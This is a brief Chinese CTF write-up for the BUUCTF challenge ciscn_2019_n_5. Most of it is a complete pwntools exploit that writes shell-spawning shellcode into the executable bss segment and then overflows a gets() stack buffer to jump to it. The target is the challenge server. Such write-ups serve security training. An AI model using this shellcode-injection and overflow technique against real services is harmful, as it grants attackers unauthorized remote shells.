【BUUCTF】ciscn_2019_n_5 Write Up

【BUUCTF】ciscn_2019_n_5 Write Up_第1张图片
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上
【BUUCTF】ciscn_2019_n_5 Write Up_第2张图片
什么保护都没开,我们发现可以直接执行bss段上的代码

思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell
【BUUCTF】ciscn_2019_n_5 Write Up_第3张图片
注意栈帧大小

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',25188)
#io=process('./ciscn_2019_n_5')
elf=ELF('./ciscn_2019_n_5')

ra()
sl(asm(shellcraft.sh()))
ra()
sl('a'*40+p64(0x601080))

io.interactive()

你可能感兴趣的:(BUUCTF,-,PWN,CTF)